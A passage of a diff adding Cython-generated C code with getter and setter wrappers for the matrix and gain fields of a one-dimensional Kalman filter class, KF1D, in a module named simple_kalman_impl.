+ int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + __pyx_t_1 = __pyx_PyFloat_AsDouble(__pyx_v_value); if (unlikely((__pyx_t_1 == (double)-1) && PyErr_Occurred())) __PYX_ERR(1, 11, __pyx_L1_error) + __pyx_v_self->A1_0 = __pyx_t_1; + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A1_0.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pxd":12 + * double A0_1 + * double A1_0 + * double A1_1 # <<<<<<<<<<<<<< + * double C0_0 + * double C0_1 + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_1_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_1_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_1___get__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_1___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->A1_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A1_1.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_1_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_1_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_1_2__set__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_1_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + __pyx_t_1 = __pyx_PyFloat_AsDouble(__pyx_v_value); if (unlikely((__pyx_t_1 == (double)-1) && PyErr_Occurred())) __PYX_ERR(1, 12, __pyx_L1_error) + __pyx_v_self->A1_1 = __pyx_t_1; + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A1_1.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pxd":13 + * double A1_0 + * double A1_1 + * double C0_0 # <<<<<<<<<<<<<< + * double C0_1 + * double A_K_0 + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_0_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_0_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_0___get__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->C0_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.C0_0.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_0_2__set__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + __pyx_t_1 = __pyx_PyFloat_AsDouble(__pyx_v_value); if (unlikely((__pyx_t_1 == (double)-1) && PyErr_Occurred())) __PYX_ERR(1, 13, __pyx_L1_error) + __pyx_v_self->C0_0 = __pyx_t_1; + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.C0_0.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pxd":14 + * double A1_1 + * double C0_0 + * double C0_1 # <<<<<<<<<<<<<< + * double A_K_0 + * double A_K_1 + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_1_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_1_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_1___get__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_1___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->C0_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.C0_1.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_1_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_1_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_1_2__set__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4C0_1_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + __pyx_t_1 = __pyx_PyFloat_AsDouble(__pyx_v_value); if (unlikely((__pyx_t_1 == (double)-1) && PyErr_Occurred())) __PYX_ERR(1, 14, __pyx_L1_error) + __pyx_v_self->C0_1 = __pyx_t_1; + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.C0_1.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pxd":15 + * double C0_0 + * double C0_1 + * double A_K_0 # <<<<<<<<<<<<<< + * double A_K_1 + * double A_K_2 + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_0_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_0_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_0___get__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->A_K_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A_K_0.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_0_2__set__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + __pyx_t_1 = __pyx_PyFloat_AsDouble(__pyx_v_value); if (unlikely((__pyx_t_1 == (double)-1) && PyErr_Occurred())) __PYX_ERR(1, 15, __pyx_L1_error) + __pyx_v_self->A_K_0 = __pyx_t_1; + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A_K_0.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pxd":16 + * double C0_1 + * double A_K_0 + * double A_K_1 # <<<<<<<<<<<<<< + * double A_K_2 + * double A_K_3 + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_1_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_1_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_1___get__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_1___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->A_K_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 16, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A_K_1.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_1_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_1_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_1_2__set__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_1_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + __pyx_t_1 = __pyx_PyFloat_AsDouble(__pyx_v_value); if (unlikely((__pyx_t_1 == (double)-1) && PyErr_Occurred())) __PYX_ERR(1, 16, __pyx_L1_error) + __pyx_v_self->A_K_1 = __pyx_t_1; + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A_K_1.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pxd":17 + * double A_K_0 + * double A_K_1 + * double A_K_2 # <<<<<<<<<<<<<< + * double A_K_3 + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_2_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_2_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_2___get__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_2___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->A_K_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 17, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A_K_2.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_2_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_2_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_2_2__set__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_2_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + __pyx_t_1 = __pyx_PyFloat_AsDouble(__pyx_v_value); if (unlikely((__pyx_t_1 == (double)-1) && PyErr_Occurred())) __PYX_ERR(1, 17, __pyx_L1_error) + __pyx_v_self->A_K_2 = __pyx_t_1; + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A_K_2.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pxd":18 + * double A_K_1 + * double A_K_2 + * double A_K_3 # <<<<<<<<<<<<<< + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_3_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_3_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_3___get__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_3___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->A_K_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 18, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A_K_3.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_3_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_3_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_3_2__set__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_5A_K_3_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + __pyx_t_1 = __pyx_PyFloat_AsDouble(__pyx_v_value); if (unlikely((__pyx_t_1 == (double)-1) && PyErr_Occurred())) __PYX_ERR(1, 18, __pyx_L1_error) + __pyx_v_self->A_K_3 = __pyx_t_1; + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A_K_3.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_6kalman_18simple_kalman_impl_4KF1D_5__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_5__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else 